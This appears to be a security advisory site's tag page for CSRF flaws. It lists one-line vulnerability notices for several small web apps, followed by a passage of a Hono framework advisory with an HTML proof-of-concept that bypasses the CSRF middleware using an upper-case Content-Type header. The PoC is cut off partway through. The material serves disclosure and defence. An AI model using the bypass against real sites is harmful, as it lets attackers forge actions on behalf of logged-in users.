Tag
#csrf
Multi-Vendor Online Groceries Management System version 1.0 suffers from an ignored default credential vulnerability.
MSMS-PHP version 1.0 suffers from an ignored default credential vulnerability.
Laundry Management System version 1.0 suffers from a remote file inclusion vulnerability.
Medicine Tracker System version 1.0 suffers from an ignored default credential vulnerability.
Medical Hub Directory Site version 1.0 suffers from an ignored default credential vulnerability.
Lodging Reservation Management System version 1.0 suffers from an ignored default credential vulnerability.
Human Resource Management System version 2024 version 1.0 suffers from a cross site scripting vulnerability.
Courier Management System version 1.0 suffers from a cross site request forgery vulnerability.
CMS RIMI version 1.3 suffers from cross site request forgery and arbitrary file upload vulnerabilities.
### Summary Hono CSRF middleware can be bypassed using crafted Content-Type header. ### Details MIME types are case insensitive, but `isRequestedByFormElementRe` only matches lower-case. https://github.com/honojs/hono/blob/b0af71fbcc6dbe44140ea76f16d68dfdb32a99a0/src/middleware/csrf/index.ts#L16-L17 As a result, attacker can bypass csrf middleware using upper-case form-like MIME type, such as "Application/x-www-form-urlencoded". ### PoC ```html <html> <head> <title>CSRF Test</title> <script defer> document.addEventListener("DOMContentLoaded", () => { document.getElementById("btn").addEventListener("click", async () => { const res = await fetch("http://victim.example.com/test", { method: "POST", credentials: "include", headers: { "Content-Type": "Application/x-www-form-urlencoded", }, }); }); }); </script> </head> <body> <h1>CSRF Test</h1> <butto...